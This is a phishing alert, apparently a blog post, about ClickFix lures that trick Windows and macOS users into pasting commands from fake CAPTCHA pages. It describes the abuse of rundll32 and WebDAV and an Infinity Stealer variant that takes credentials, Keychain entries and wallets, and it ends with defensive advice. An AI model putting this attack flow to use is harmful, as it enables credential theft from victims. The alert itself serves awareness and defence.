Phishing Alert – ClickFix Tactics Evolve, Now Attacking Both Windows and macOS
Type: Phishing
Phishing Alert
Current Status and Related Trends
Recent threat intelligence indicates that ClickFix tactics, originally targeting Microsoft Windows, have now evolved with a new variant aimed at macOS. This expansion demonstrates that the technique is increasingly being deployed by multiple attackers.
Traditional Windows-focused ClickFix attacks
These campaigns mimic the familiar “Verify You are a Human” tests commonly used by websites to distinguish legitimate users from bots. Victims are prompted to press specific keyboard combinations, which ultimately result in the download and execution of malicious software on Microsoft Windows systems.
The deceptive process typically unfolds as follows:
- The user is instructed to press the Windows key and the letter “R” simultaneously, opening the Windows “Run” prompt capable of executing any program already installed on the system.
- The user is told to press CTRL + V, pasting malicious code from the site’s virtual clipboard into the Run prompt.
- Pressing Enter executes the pasted code, initiating the download and installation of malware.
Latest Windows Variant – Abusing Windows components Rundll32 & WebDAV
The most recent ClickFix variant maliciously abuses legitimate Windows components, rundll32.exe and WebDAV to deliver payloads. It loads remote DLLs via ordinal calls to evade detection, reducing reliance on script engines and bypassing traditional monitoring. This shift to native Windows components, combined with anti-analysis techniques, makes the attack stealthier and harder to detect.
(ClickFix attack targetting Windows users)
macOS Variant – Infinity Stealer
A new macOS-targeted ClickFix variant delivers Infinity Stealer via fake Cloudflare CAPTCHA lures. Victims are tricked into pasting a malicious curl command into the macOS Terminal, installing a Python-based infostealer compiled with Nuitka for enhanced evasion.
Infinity Stealer can:
- Steal credentials from Chromium-based browsers and Firefox
- Extract macOS Keychain entries
- Access cryptocurrency wallets
- Read plaintext secrets from developer files (e.g., `.env`)
All stolen data is exfiltrated via HTTP POST requests to the C2 server, with a Telegram alert sent to attackers upon completion. This campaign highlights ClickFix’s expansion from Windows to macOS, employing more advanced and stealthy techniques.
.jpg)
(ClickFix attack targetting macOS users)
(Ref: https://www.bleepingcomputer.com/news/security/new-infinity-stealer-malware-grabs-macos-data-via-clickfix-lures/)
Recommendations
Organisations and individuals are urged to stay alert to evolving ClickFix phishing tactics, which now target both Windows and macOS systems, and take proactive measures to prevent compromise. To guard against related ClickFix attacks, please take the following measures:
- Do not follow suspicious CAPTCHA prompts or paste unknown commands into Windows Run prompts or macOS Terminal.
- Update and maintain security software to detect and block malicious rundll32 or curl activity.
- Block known malicious domains and monitor network traffic for unusual connections to C2 servers.
- Stay aware on phishing and social engineering tactics to prevent interaction with deceptive ClickFix lures.
沒有留言:
發佈留言